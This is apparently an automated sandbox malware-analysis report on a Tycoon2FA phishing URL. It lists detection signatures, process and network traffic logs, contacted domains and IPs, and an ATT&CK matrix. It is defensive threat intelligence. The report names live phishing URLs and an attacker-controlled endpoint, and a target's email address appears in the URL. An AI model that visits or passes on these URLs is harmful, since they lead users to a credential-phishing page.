Edit tour

Windows Analysis Report
https://nr2.vesuperw.ru/IDnh/#Dkeyaccount@foster-uk.com

Overview

General Information

Sample URL:https://nr2.vesuperw.ru/IDnh/#Dkeyaccount@foster-uk.com
Analysis ID:1641500
Infos:

Detection

Invisible JS, Tycoon2FA
Score:92
Range:0 - 100
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Yara detected AntiDebug via timestamp check
Yara detected Invisible JS
Yara detected Obfuscation Via HangulCharacter
Yara detected Tycoon 2FA PaaS
AI detected suspicious Javascript
Creates files inside the system directory
Deletes files inside the Windows folder
HTML page contains hidden javascript code
URL contains potential PII (phishing indication)

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
  • System is w10x64_ra
  • chrome.exe (PID: 2556 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: E81F54E6C1129887AEA47E7D092680BF)
    • chrome.exe (PID: 6012 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1984,i,12748416017777575121,7501064467669812107,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2212 /prefetch:3 MD5: E81F54E6C1129887AEA47E7D092680BF)
  • chrome.exe (PID: 6676 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://nr2.vesuperw.ru/IDnh/#Dkeyaccount@foster-uk.com" MD5: E81F54E6C1129887AEA47E7D092680BF)
  • cleanup
SourceRuleDescriptionAuthorStrings
0.2.d.script.csvJoeSecurity_Tycoon2FA_1Yara detected Tycoon 2FA PaaSJoe Security
    0.2.d.script.csvJoeSecurity_AntiDebugBrowserYara detected AntiDebug via timestamp checkJoe Security
      0.1.d.script.csvJoeSecurity_HangulCharacterYara detected Obfuscation Via HangulCharacterJoe Security
        0.5..script.csvJoeSecurity_Tycoon2FA_1Yara detected Tycoon 2FA PaaSJoe Security
          0.1.d.script.csvJoeSecurity_InvisibleJSYara detected Invisible JSJoe Security
            Click to see the 6 entries
            No Sigma rule has matched
            No Suricata rule has matched

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: https://nr2.vesuperw.ru/IDnh/#Dkeyaccount@foster-uk.comAvira URL Cloud: detection malicious, Label: malware
            Source: https://nr2.vesuperw.ru/IDnh/Avira URL Cloud: Label: malware

            Phishing

            barindex
            Source: Yara matchFile source: 0.1.d.script.csv, type: HTML
            Source: Yara matchFile source: 0.0.pages.csv, type: HTML
            Source: Yara matchFile source: 0.1.pages.csv, type: HTML
            Source: Yara matchFile source: 0.1.d.script.csv, type: HTML
            Source: Yara matchFile source: 0.0.pages.csv, type: HTML
            Source: Yara matchFile source: 0.1.pages.csv, type: HTML
            Source: Yara matchFile source: 0.2.d.script.csv, type: HTML
            Source: Yara matchFile source: 0.5..script.csv, type: HTML
            Source: Yara matchFile source: 0.0.pages.csv, type: HTML
            Source: Yara matchFile source: 0.1.pages.csv, type: HTML
            Source: 0.0..script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://nr2.vesuperw.ru/IDnh/... The script contains obfuscated code and URLs, uses dynamic code execution, and interacts with a suspicious domain. These high-risk indicators suggest potentially malicious behavior.
            Source: 0.1.d.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: anonymous function... The script uses dynamic code execution via eval, which is a high-risk indicator. It also contains heavily obfuscated code, another high-risk indicator. The combination of these behaviors suggests a high potential for malicious activity.
            Source: https://nr2.vesuperw.ru/IDnh/#Dkeyaccount@foster-uk.comHTTP Parser: Base64 decoded: <!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Office 365 Documentation</title> <style> body { font-family: Arial, sans-serif...
            Source: https://nr2.vesuperw.ru/IDnh/#Dkeyaccount@foster-uk.comSample URL: PII: Dkeyaccount@foster-uk.com
            Source: https://nr2.vesuperw.ru/IDnh/#Dkeyaccount@foster-uk.comSample URL: PII: Dkeyaccount@foster-uk.com
            Source: https://nr2.vesuperw.ru/IDnh/#Dkeyaccount@foster-uk.comSample URL: PII: Dkeyaccount@foster-uk.com
            Source: https://nr2.vesuperw.ru/IDnh/#Dkeyaccount@foster-uk.comSample URL: PII: Dkeyaccount@foster-uk.com
            Source: https://nr2.vesuperw.ru/IDnh/#Dkeyaccount@foster-uk.comSample URL: PII: Dkeyaccount@foster-uk.com
            Source: https://nr2.vesuperw.ru/IDnh/#Dkeyaccount@foster-uk.comSample URL: PII: Dkeyaccount@foster-uk.com
            Source: https://nr2.vesuperw.ru/IDnh/#Dkeyaccount@foster-uk.comSample URL: PII: Dkeyaccount@foster-uk.com
            Source: https://nr2.vesuperw.ru/IDnh/#Dkeyaccount@foster-uk.comSample URL: PII: Dkeyaccount@foster-uk.com
            Source: https://nr2.vesuperw.ru/IDnh/#Dkeyaccount@foster-uk.comSample URL: PII: Dkeyaccount@foster-uk.com
            Source: https://nr2.vesuperw.ru/IDnh/#Dkeyaccount@foster-uk.comSample URL: PII: Dkeyaccount@foster-uk.com
            Source: https://nr2.vesuperw.ru/IDnh/#Dkeyaccount@foster-uk.comSample URL: PII: Dkeyaccount@foster-uk.com
            Source: https://nr2.vesuperw.ru/IDnh/#Dkeyaccount@foster-uk.comSample URL: PII: Dkeyaccount@foster-uk.com
            Source: https://nr2.vesuperw.ru/IDnh/#Dkeyaccount@foster-uk.comSample URL: PII: Dkeyaccount@foster-uk.com
            Source: https://nr2.vesuperw.ru/IDnh/#Dkeyaccount@foster-uk.comSample URL: PII: Dkeyaccount@foster-uk.com
            Source: https://nr2.vesuperw.ru/IDnh/#Dkeyaccount@foster-uk.comHTTP Parser: No favicon
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.16:49700 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.16:49699 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.16:49701 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 151.101.194.137:443 -> 192.168.2.16:49704 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.18.94.41:443 -> 192.168.2.16:49707 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.17.25.14:443 -> 192.168.2.16:49708 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.16.5.189:443 -> 192.168.2.16:49710 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.16.2.189:443 -> 192.168.2.16:49711 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.185.68:443 -> 192.168.2.16:49712 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.78.32:443 -> 192.168.2.16:49713 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.78.32:443 -> 192.168.2.16:49714 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 2.23.227.208:443 -> 192.168.2.16:49723 version: TLS 1.2
            Source: chrome.exeMemory has grown: Private usage: 6MB later: 38MB
            Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
            Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
            Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
            Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
            Source: unknownTCP traffic detected without corresponding DNS query: 172.217.16.195
            Source: unknownTCP traffic detected without corresponding DNS query: 172.217.16.195
            Source: unknownTCP traffic detected without corresponding DNS query: 172.217.16.195
            Source: unknownTCP traffic detected without corresponding DNS query: 172.217.16.195
            Source: unknownTCP traffic detected without corresponding DNS query: 172.217.16.195
            Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
            Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
            Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
            Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
            Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
            Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
            Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
            Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
            Source: unknownTCP traffic detected without corresponding DNS query: 2.23.227.208
            Source: unknownTCP traffic detected without corresponding DNS query: 2.23.227.208
            Source: unknownTCP traffic detected without corresponding DNS query: 2.23.227.208
            Source: unknownTCP traffic detected without corresponding DNS query: 2.23.227.208
            Source: unknownTCP traffic detected without corresponding DNS query: 2.23.227.208
            Source: unknownTCP traffic detected without corresponding DNS query: 2.23.227.208
            Source: unknownTCP traffic detected without corresponding DNS query: 2.23.227.208
            Source: unknownTCP traffic detected without corresponding DNS query: 2.23.227.208
            Source: unknownTCP traffic detected without corresponding DNS query: 2.23.227.208
            Source: unknownTCP traffic detected without corresponding DNS query: 2.23.227.208
            Source: unknownTCP traffic detected without corresponding DNS query: 2.23.227.208
            Source: unknownTCP traffic detected without corresponding DNS query: 2.23.227.208
            Source: unknownTCP traffic detected without corresponding DNS query: 172.217.16.195
            Source: global trafficHTTP traffic detected: GET /IDnh/ HTTP/1.1Host: nr2.vesuperw.ruConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://nr2.vesuperw.ru/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /turnstile/v0/api.js?onload=onloadTurnstileCallback HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://nr2.vesuperw.ru/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://nr2.vesuperw.ru/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /turnstile/v0/g/f3b948d8acb8/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://nr2.vesuperw.ru/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /favicon.png HTTP/1.1Host: developers.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://nr2.vesuperw.ru/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /favicon.png HTTP/1.1Host: developers.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=YaO7ndI1t2An7gTAuzBwUPNdxzxSz18DqsXbD8irVpY-1742289325-1.0.1.1-3xo7Zql2bPGg.ruB2lfldzGAwbWJpgSmNYpNz6Kq1X3qp8sIDlXCJPGYR9tgPr9aWFBthGnYWYXX3esL.o2VOOLYQ2mXfrbFUNMOH3KLPK8
            Source: global trafficHTTP traffic detected: GET /kabutar$czeosv8k HTTP/1.1Host: 3gd07.gqzxtn.ruConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Origin: https://nr2.vesuperw.ruSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://nr2.vesuperw.ru/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /kabutar$czeosv8k HTTP/1.1Host: 3gd07.gqzxtn.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /r/gsr1.crl HTTP/1.1Cache-Control: max-age = 3000Connection: Keep-AliveAccept: */*If-Modified-Since: Tue, 07 Jan 2025 07:28:00 GMTUser-Agent: Microsoft-CryptoAPI/10.0Host: c.pki.goog
            Source: global trafficHTTP traffic detected: GET /r/r4.crl HTTP/1.1Cache-Control: max-age = 3000Connection: Keep-AliveAccept: */*If-Modified-Since: Thu, 25 Jul 2024 14:48:00 GMTUser-Agent: Microsoft-CryptoAPI/10.0Host: c.pki.goog
            Source: global trafficDNS traffic detected: DNS query: nr2.vesuperw.ru
            Source: global trafficDNS traffic detected: DNS query: code.jquery.com
            Source: global trafficDNS traffic detected: DNS query: challenges.cloudflare.com
            Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
            Source: global trafficDNS traffic detected: DNS query: developers.cloudflare.com
            Source: global trafficDNS traffic detected: DNS query: www.google.com
            Source: global trafficDNS traffic detected: DNS query: 3gd07.gqzxtn.ru
            Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
            Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
            Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49699
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
            Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49679 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49671 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
            Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.16:49700 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.16:49699 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.16:49701 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 151.101.194.137:443 -> 192.168.2.16:49704 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.18.94.41:443 -> 192.168.2.16:49707 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.17.25.14:443 -> 192.168.2.16:49708 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.16.5.189:443 -> 192.168.2.16:49710 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.16.2.189:443 -> 192.168.2.16:49711 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.185.68:443 -> 192.168.2.16:49712 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.78.32:443 -> 192.168.2.16:49713 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.78.32:443 -> 192.168.2.16:49714 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 2.23.227.208:443 -> 192.168.2.16:49723 version: TLS 1.2
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\scoped_dir2556_1674848701
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile deleted: C:\Windows\SystemTemp\scoped_dir2556_1674848701
            Source: classification engineClassification label: mal92.phis.evad.win@22/6@18/192
            Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1984,i,12748416017777575121,7501064467669812107,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2212 /prefetch:3
            Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://nr2.vesuperw.ru/IDnh/#Dkeyaccount@foster-uk.com"
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1984,i,12748416017777575121,7501064467669812107,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2212 /prefetch:3
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: Window RecorderWindow detected: More than 3 window changes detected

            Malware Analysis System Evasion

            barindex
            Source: Yara matchFile source: 0.2.d.script.csv, type: HTML
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
            Browser Extensions
            1
            Process Injection
            1
            Masquerading
            OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
            Encrypted Channel
            Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
            Extra Window Memory Injection
            1
            Process Injection
            LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media2
            Non-Application Layer Protocol
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
            File Deletion
            Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive3
            Application Layer Protocol
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
            Extra Window Memory Injection
            NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture1
            Ingress Tool Transfer
            Traffic DuplicationData Destruction

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            https://nr2.vesuperw.ru/IDnh/#Dkeyaccount@foster-uk.com100%Avira URL Cloudmalware
            No Antivirus matches
            No Antivirus matches
            No Antivirus matches
            SourceDetectionScannerLabelLink
            https://nr2.vesuperw.ru/IDnh/100%Avira URL Cloudmalware
            https://3gd07.gqzxtn.ru/kabutar$czeosv8k0%Avira URL Cloudsafe
            NameIPActiveMaliciousAntivirus DetectionReputation
            code.jquery.com
            151.101.194.137
            truefalse
              high
              developers.cloudflare.com
              104.16.5.189
              truefalse
                high
                cdnjs.cloudflare.com
                104.17.25.14
                truefalse
                  high
                  challenges.cloudflare.com
                  104.18.94.41
                  truefalse
                    high
                    www.google.com
                    142.250.185.68
                    truefalse
                      high
                      nr2.vesuperw.ru
                      188.114.97.3
                      truetrue
                        unknown
                        3gd07.gqzxtn.ru
                        104.21.78.32
                        truefalse
                          unknown
                          NameMaliciousAntivirus DetectionReputation
                          https://nr2.vesuperw.ru/IDnh/#Dkeyaccount@foster-uk.comtrue
                            unknown
                            https://code.jquery.com/jquery-3.6.0.min.jsfalse
                              high
                              https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.jsfalse
                                high
                                https://challenges.cloudflare.com/turnstile/v0/api.js?onload=onloadTurnstileCallbackfalse
                                  high
                                  https://developers.cloudflare.com/favicon.pngfalse
                                    high
                                    https://nr2.vesuperw.ru/IDnh/true
                                    • Avira URL Cloud: malware
                                    unknown
                                    https://3gd07.gqzxtn.ru/kabutar$czeosv8kfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://challenges.cloudflare.com/turnstile/v0/g/f3b948d8acb8/api.jsfalse
                                      high
                                      • No. of IPs < 25%
                                      • 25% < No. of IPs < 50%
                                      • 50% < No. of IPs < 75%
                                      • 75% < No. of IPs
                                      IPDomainCountryFlagASNASN NameMalicious
                                      142.250.186.46
                                      unknownUnited States
                                      15169GOOGLEUSfalse
                                      142.250.186.35
                                      unknownUnited States
                                      15169GOOGLEUSfalse
                                      142.250.185.67
                                      unknownUnited States
                                      15169GOOGLEUSfalse
                                      142.250.185.68
                                      www.google.comUnited States
                                      15169GOOGLEUSfalse
                                      1.1.1.1
                                      unknownAustralia
                                      13335CLOUDFLARENETUSfalse
                                      172.217.16.206
                                      unknownUnited States
                                      15169GOOGLEUSfalse
                                      172.217.18.14
                                      unknownUnited States
                                      15169GOOGLEUSfalse
                                      104.18.94.41
                                      challenges.cloudflare.comUnited States
                                      13335CLOUDFLARENETUSfalse
                                      104.16.5.189
                                      developers.cloudflare.comUnited States
                                      13335CLOUDFLARENETUSfalse
                                      142.250.181.227
                                      unknownUnited States
                                      15169GOOGLEUSfalse
                                      104.21.78.32
                                      3gd07.gqzxtn.ruUnited States
                                      13335CLOUDFLARENETUSfalse
                                      188.114.97.3
                                      nr2.vesuperw.ruEuropean Union
                                      13335CLOUDFLARENETUStrue
                                      151.101.194.137
                                      code.jquery.comUnited States
                                      54113FASTLYUSfalse
                                      104.17.25.14
                                      cdnjs.cloudflare.comUnited States
                                      13335CLOUDFLARENETUSfalse
                                      104.16.2.189
                                      unknownUnited States
                                      13335CLOUDFLARENETUSfalse
                                      66.102.1.84
                                      unknownUnited States
                                      15169GOOGLEUSfalse
                                      IP
                                      192.168.2.16
                                      192.168.2.5
                                      Joe Sandbox version:42.0.0 Malachite
